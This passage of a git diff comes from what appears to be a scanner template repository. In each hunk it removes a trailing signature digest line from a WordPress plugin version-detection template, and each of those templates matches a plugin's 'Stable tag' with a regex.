'(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100800e0e918b89f4478c5da0db5a3c303de41c8b3597ff5c071bf93f2d6aefa25b02206e4a57146411d0476703c7e9824a7a6728ee19133db90137158b40cdd73b881d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index a74159d826..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022043aa8ce92c705c1574e1f273c22dad65021567e03e3e85df870ae54668d25c8e02210089be38c3e1dc50b647305866055ee5add267a0e85e90b32db9cedc278980c92c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index d86fa5d820..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022025b9a7eec19ae74467af0fde0cdc7f8080300f1bf5d4516bfc0436de35543fee022100dc3be402196702268f86fed14d387d2aadc22bd185c190f427d5319ac2cd8cfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 7dd4f4658c..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022071ed8ec9b4e8a324c6f6f723dca8e9f13136c4d564da33f3f97f0f2f3a2d30640220251969161cbfe4ec6f18f0245f79e45a9ad0315b4966fb67849bb24d4e6e4043:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index cece8c3be3..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ea77a6c4e32f7a4a00f8c05cb0e37702c0bd8fd68d47978fdd9f0b20f6fdf4bd02207068c7d84d79a943160c22f4a68d71c71c32496b57c66ea274a3fa5d01a27274:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 84049a1631..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201067a9614491b6c7978a8845569286fac7c3252d48cca62e06dcba2d2c0fd1c90220039f926bebab24f66e00856ad5dbc7b048f3342237153822b3f278844fdd5c0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d42182a111..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e401f3fb1c0ba7f49e627a5c1ccdbcd97164932f22a5a711fbbc07e1fd6398f9022018ea1f0d28bd6400b4d3249d9b0bb2a5e4786cbafb6247d85dcf851294e4b8bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 6114bcf985..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d258e51678336ba3e557ceb2a701aaa0951e5ce9d79e1fab857754be1a27eeeb022039c92b0be20928eee3f1454c64fc7ebd5f660bc11507e0d39c7ab1b9bbee842f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 007f793a56..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202ae41b0136b74a2bb5c43c42690bb77fe1be34a7d34c465606e1866cc8afa21702203ed847c16212a8a3f0839c6be588505081dcb4c8ebc94c819f0f1bb0753fb878:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4163dd34b4..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c5839e1b399cbd2b36529e7f075e7483a3c80c522484a4ece84f9f2d45ab67a6022100bbafb3fbd623b0db7dfb66161d96c3fc4ebce8c03cdca09f5b0160711c8a8dcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 91a823adda..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205fa6733826f9737d836ec50c6c361477c9facbbaea96523ac5481d36ada70a36022076bd74b033519285aa85694c69dda94e1d57b7f88d1b1c455b068c40ea5109d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index f7f8aedc2f..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202b8d9dc33310c641f1a192c7e6609b1134115a7382632ebc2330cde7efa9fa2902207a459ac158a028414b14329d1852368d8534f07cf242b0df77a35aed26d1b95c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index eb605eda8e..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220186cad4cec9f0c7fa46b8dcd6fbd38079ca8a03abcdaf06010ca8a72ec9c2316022100e4544eb6ecc1156b0250dbaa2abefc2a7a43b51ac4a0b073832e0cfaa5d29e96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 63eda397d4..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220606112e5c179165426e34af89874e4e86861cb6e242af2cf2857af66637ba7ef022100dfa680598ec1f106e69438a7387c46d095f6b85036d3fc7f1b64dd04cd7ac7fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index eabf88ddb9..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203adf0f44fcc37071a8337a45aec77321ad36788a1701e8d5499ff6b1388219ca02206a19a99455666f28368f6cc4e2486ed042683123c6f1b7cde5a65386e743dda1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 9580de33aa..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100863cf9094df89df4a3f304021704d6cd0b08addfd56c37e2242c3c6566acbc9f02203d13fa96c1dfe53d07ce4eb7bb8ab07f67a11bbf80b7f7612689e81c9a0eb18f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 43b3bf11ff..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203b41f4bc0f03874e45e565ed3f9eb58ea829554b66c9efc6e868024c742c1981022100a74173d9048d84bb63727cfdd6cefe3858d314994a48ba1bb8461c66705f37b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 36a0dbdb55..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220343c8735af0c8a7559702176381c03cc4516d1ea71590e6af76e096ac9c6626202203ab9b1d9b3dee07ee5584ec4c0edcad2991496be50cb3519c584e5e647810ab7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 9ea8246471..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210087f682a6cf889e23d920aada1176883cb3603f391cb288ad423072bea2a13b7802210095ec378ab5de993c37372ef75c3d9a15d348772d378edbbb60c5e6cdb0f58de0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 6348dee29f..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e4767b6dc1a7edaa040c8c44cbc6fe8b1b698b8d6e28741218411fe5bdac2e34022100f8860376573a65bd6cba0ce118e57f8501e8afbca6024cf449cd66ec8ee2b1b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 6f3753bf4d..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dd16b650d346cd70bdb02361b92ed3906328249dcd1054ecc0a331b36ae9438e02202bd06e10d51669be9bdef6a2574cef449924a6f0b4b98a871ddf6a05d3107d23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 0c5a2d4eec..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022066b1b191263a96aa27caac086de3bddc0836dcc4040cca5a323124812ebd5bee022100de1f7e490c99fec16ed5802bdd8c7b59065b277721fdd6e0223e5609cd1b7de4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 2fa60025b2..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c5ec4e0dc1b223cdca940a1db721c2481c1685e5289d397ebb69a4bb0aa64765022019c8a03c792ee05d1c1ff411779a7e4a9293f52ffccb0d0d9b178ae83895bf01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 736097ba0d..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d4152f625a0cdb033642eb236fa99fc068e7c1d3fcf3d2a26d3348b3e2b5b6d4022100f14b3cf3e56a1af8fefe08d0bdb37fab3bb43ad574c9d338db7db4b6e7c8bc07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index f163553aad..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100982a748e17c781c518d3ee351dd83cf08d7bad3a533ec3e1a5548a5c2e966682022100e94a972c295690db33c638dcafcb1b7ee92c23675fb70c7d5c553202e613bbf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index b1a85bcdb0..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206a7f4ca165b7fd90f2004d0a3287dd1cf2d79c71bd84b320a6732083e455b3e0022100cfb08d769379d0253742c0a8635cb465fe63d925bea9aa05bf84d225b0044bd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index d2136cc12a..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022034f05000be07eaabcab7f70ac51b69f695993d3d7fbdb669866b62b84d826bdb022035b73834eb26e1f8042bc4c3b512723f5a283a185ff952dae7436322baa3fa76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 3ece35df48..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022000f3c4082359daf7f83a7c93c1a34b364a546082a0dfb5eefac55cf7986716d10221009a764e16de307c9706a156ddaaabcbe0a63828414c26acb881ec721c9fce0918:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index fa28c3f742..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022059daf9857cfe2ffeac03f69dc9d552fcf2872de2ea9eafd1813f8e881bcbe70502200f308da24790b1c89d43626d51bd60949bcb3c9ae1deaa06e15132a512409944:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 89ed6506d9..c20ed6552a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009f50d58c66261a4cc8b6990bbafd81f67372c1ce5191b0ee216ba08e415e4ad0022016996af41065314c0e71191577a699b1d6fe1d80594e03c3662e7801e00a828e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 81bb86ec93..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008de180336e5c8e6da24d43e5a4455a5925495557a6640febc4acc516c06f2756022100abd45773f60dad6d9d3315ae9ea6c8da9521c9a87f5184e8521edad0641170ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 5f84cffbe9..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022060aba6a7b807250fc038e008bc76a9855c855b3e52e0a2c27257d23a61b35ae2022100b45b8d87cfaae112257ac7c57f4654497b17de410d50e28ffc29e3f4e9e42716:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 9fd108f837..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009bfd091b38b40e91020d9887fa334bb6a4ca171e29c2ed3fae970134d91fb043022100eed9df5f95270168343a16907cb819b1ca68535943a38feec1b0e204b9e0b8b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index dc59cd19a1..38391bd9f3 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f8002fbae4f94e2c94213f5ceb84c58121f24817393904ae9ca2f7d2b487de9602200addc5c1fea399f2e12d114e52ae27eea8d271aa3aa35756a1321ef03b27f8ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0fe24c3896..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a0779d523b58a6c85cdb4c43a434551191dde11b62088456f26494dc6c092256022100f5a0ef41c22b2e0f60369a459c618d44046a2f5ec95099abefd5ccc376b392cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 8ce4238b4f..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b58f2ba44e3f21ba17d75f6eb15e2f6bf67d0b0d36a736d72fa4d8895988ac7c022100ce1acd6be0c7302a1a79ec38068c39531ce5a862b71d42abec1b79106afd9822:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 75af29d1dc..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203db2f9eee6275866e1b45f12542feaab914bcd8e10018a29f4459d14d277c22d0220555eeec29e152c773548daa5f4118f36ec6e25c998907494b8dafb0d7a16f937:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index a626964883..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fef9dbc38615ab39f6a5827b69390295e6901b97fe8a2d86f06929181d4f90e10221009a2792f1701c59be86ed1dabb47ba4f18a650079936778529d828ed1788a8baa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 1836eafd45..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d964ec6dcc22520d5ae98e3acb2844a4831d5c7c932070245a343785e1060409022100e941e13d597b463e96e01ab6aad8dff62b91dbd50a778378eea633062ba5896a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index c8b0159c09..3e1e79e004 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206a489dcc880c505b1a8cd17fc271810afd19aa550cf8859effbf2dc5cc686884022100d67591a10cde5eeb0017204f2364138f0b71a53d2d1dd9897b0f2ec07b634b87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 18176d3e9f..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022037888385a69c96812016bce046a0a3dfc6b8155627ccbf005aa3e2e2bef211d002204eeae3f7244ad49ea180d5716dcbd87b14fc185a461310715ba36989b1836acf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 0bfa0d3dcc..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022058470da86b331d6e4688ecbfabad626341111421b0989a0fce945e2712f8125c022100c76e7dfd56b5c3e6866c767808146f705e25f82a0265ad4270625283e4d1bef0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 993077eb74..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200beee5948afd38f9afd8fdeefa5c3e4beae66aa06e4bbebf0d900b6a673a8e0b02205c5f21af0f4ef9ec0c3b86339519b235a1442b19c63274d8d066e4a4765fec9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index f816f9c054..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009718266974443bea43aa3a4371eb72847b9370addca8862705f5391732bb19390221009f737a958591bf541ca9f3e46bb2c16819c3d6cd40268f42aeec11801fe7bc2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 1d3b631307..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210098afdb117b842284a65673ccc3ace644ddbf35b3348d42250b7f8e63f404d88102206423d84f858f2a5c0bafadd0aa65ddd11fa4c9a0acf008c45895d46f4ef9cfc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index f21a36179f..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f7a7fcb1c7a28d9369e391ec476871ecbabb5a097d3d758df13a6cc028948fd3022100a1ee5dcf108727d0f9b5028b80b23766ee7b95c85f9db9c905586083711e1aad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 7ef088ca91..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dd085c8ee6a30bd45f92d0953a1c29e189976122d0c5354877353b80a23230ea022045fd7bd231639305136c76bb1808ac6a0d24487c19a1ea22039161affe9769b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 90d27c72ff..27586cbd9d 100644 --- 